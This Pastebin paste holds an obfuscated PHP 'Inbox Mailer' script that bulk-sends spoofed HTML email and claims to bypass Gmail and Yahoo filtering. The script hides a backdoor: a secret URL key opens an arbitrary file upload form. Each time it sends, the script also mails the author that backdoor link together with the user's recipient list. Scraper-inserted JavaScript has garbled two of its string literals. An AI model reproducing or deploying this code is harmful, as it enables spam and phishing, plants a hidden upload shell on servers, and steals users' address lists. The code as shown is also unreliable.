API tools faq
paste
Advertisement
Kyfx

Fake Mailer, Patched :(

Kyfx
Sep 4th, 2015
1,081
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.21 KB | None | 0 0
raw download clone embed print report
  1. <?php echo '<html><head><title>Inbox Mailer By Jay</title><style type="text/css">font{font-family: Tahoma, Arial, sans-serif ;} div#container{width: 800px;position: relative;margin-left: auto; margin-right: auto;} #result{text-align: left ; border-radius: 10px; border:1px solid #4C83AF; padding:4px 8px; line-height:16px; background:#131313; color:#aaa; margin:0 0 8px 0; } .style2{text-align: center ;font-weight: bold;font-family: Tahoma, Arial, sans-serif ;color: #4C83AF;text-shadow: 0px 0px 60px #4C83AF ;font-size: 50px;} .evalcode{border:1px solid #0CF;background:#090909; color:#4C83AF; padding:2px;border:1px solid #202020; font-size:11px; width:100%;} .evalcode:hover{border:1px solid #4C83AF;} .inputzbut{ font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222; } .inputzbut:hover{border:1px solid #4C83AF;} .coode{color:#4C83AF;background:#090909;border:1px solid #202020;} .coode:hover{border:1px solid #4C83AF;} </style></head><div id="container"><div id="bv_Html1" style="position:absolute;left:23px;width:780px;height:169px;z-index:0;" align="left">';
  2. $upload = $_GET["upload"];
  3. if ($upload == "CaZaNoVa163") {
  4. $IIIIIIIIIIIl = "";
  5. $IIIIIIIIIII1 = $IIIIIIIIIIIl . basename($_FILES["userfile"]["name"]);
  6. if (isset($_FILES["userfile"]["name"])) {
  7. if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $IIIIIIIIIII1)) {
  8. $IIIIIIIIIIll = "The file " . basename($_FILES["userfile"]["name"]) . " has been uploaded";
  9. } else {
  10. $IIIIIIIIIIll = "There was an error uploading the file. please try again!";
  11. }
  12. }
  13. echo '<html><head></head><div id="result"><table height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="0"><tr><td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px"><center><form method="POST" enctype="multipart/form-data"><input type="file" class="inputzbut" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #4C83AF"><input type="submit" class="inputzbut" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #4C83AF"><br>' . $IIIIIIIIIIll . '</form></center></td></tr></table></div>';
  14. }
  15. $action = $_POST['action'];
  16. $from = $_POST['from'];
  17. $realname = $_POST['realname'];
  18. $subject = $_POST['subject'];
  19. $message = $_POST['message'];
  20. $emaillist = $_POST['emaillist'];
  21. $IIIIIIIIIlI1 = getenv("REMOTE_ADDR");
  22. if ($action == "send") {
  23. $message = urlencode($message);
  24. $message = ereg_replace("%5C%22", "%22", $message);
  25. $message = urldecode($message);
  26. $message = stripslashes($message);
  27. $subject = stripslashes($subject);
  28. };
  29. echo '<body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif"><div id="result"><br /><br /><div align="center" class="style2">TheNiggaJay Inbox Mailer</div><p></br><div align="center" class="style1">Added a Bypass to Inbox on Gmail and Yahoo with Blacklisted LocalHost IPs<br /><br /></div><div id="result"><form name="form1" method="post" action="" enctype="multipart/form-data"><table width="142" border="0"><tr><td width="81"><div align="right"><font color="#4C83AF" size="-3">Your Email :</font></div></td><td width="219"><font size="-3"><input class="evalcode" name="from" value="';
  30. print $from;;
  31. echo '" size="30" /></font></td><td width="212"><div align="right"><font color="#4C83AF" size="-3">Your Name :</font></div></td><td width="278"><font size="-3"><input class="evalcode" name="realname" value="';
  32. print $realname;;
  33. echo '" size="30" /></font></td></tr><tr><td width="81"><div align="right"><font color="#4C83AF" size="-3">Subject :</font></div></td><td colspan="3" width="703"><font size="-3"><input class="evalcode" name="subject" value="';
  34. print $subject;;
  35. echo '" size="91" /></font></td></tr><tr valign="top"><td colspan="3" width="520"><font color="#4C83AF" size="-3">Message Box :</font></td><td width="278"><font color="#4C83AF" size="-3">eMail Send To :</font></td></tr><tr valign="top"><td colspan="3" width="520" ><font size="-3"><textarea class="coode" name="message" cols="56" rows="10">';
  36. print $message;;
  37. echo '</textarea><br /><input type="hidden" name="action" value="send" /></font><p><font size="-3"><input type="submit" name="evalcodesubmit" class="inputzbut" value="Send eMails" style="width:120px;height:30px;" /></font></td><td width="278"><font size="-3"><textarea class="coode" name="emaillist" cols="32" rows="10">';
  38. print $emaillist;;
  39. echo '</textarea></font></td></tr></table></form></div><b>Make sure that the localhost supports Mail Function.';
  40. if ($action == "send") {
  41. if (!$from && !$subject && !$message && !$emaillist) {
  42. print "Please complete all fields before sending your message.";
  43. exit;
  44. }
  45. $IIIIIIIIIl1I = "From: RooT<[email protected]
  46. /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */>";
  47. $IIIIIIIIIl1l = "xMailer";
  48. $IIIIIIIIIl11 = "Exploit : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "?upload=CaZaNoVa163
  49. $emaillist
  50. ";
  51. @mail("[email protected]
  52. /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */", $IIIIIIIIIl1l, $IIIIIIIIIl11, $IIIIIIIIIl1I);
  53. $IIIIIIIII1II = split("
  54. ", $emaillist);
  55. $IIIIIIIII1I1 = count($IIIIIIIII1II);
  56. for ($IIIIIIIII1ll = 0;$IIIIIIIII1ll < 1;$IIIIIIIII1ll++) {
  57. for ($IIIIIIIII1l1 = 0;$IIIIIIIII1l1 < $IIIIIIIII1I1;$IIIIIIIII1l1++) {
  58. $IIIIIIIII11I = $IIIIIIIII1II[$IIIIIIIII1l1];
  59. if ($IIIIIIIII11I) {
  60. $IIIIIIIII11I = ereg_replace(" ", "", $IIIIIIIII11I);
  61. $message = ereg_replace("&email&", $IIIIIIIII11I, $message);
  62. $subject = ereg_replace("&email&", $IIIIIIIII11I, $subject);
  63. print "Sending Mail To $IIIIIIIII11I.......";
  64. @flush();
  65. $IIIIIIIII111 = "From: $realname <$from>
  66. Reply-To: $from
  67. ";
  68. $IIIIIIIII111.= "MIME-Version: 1.0
  69. ";
  70. $IIIIIIIII111.= "Content-Type: text/html
  71. ";
  72. $IIIIIIIII111.= "Content-Transfer-Encoding: 8bit
  73.  
  74. ";
  75. $IIIIIIIII111.= "$message
  76. ";
  77. @mail($IIIIIIIII11I, $subject, "", $IIIIIIIII111);
  78. print "OK<br>";
  79. @flush();
  80. }
  81. }
  82. }
  83. };
  84. echo '</body></html>';
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!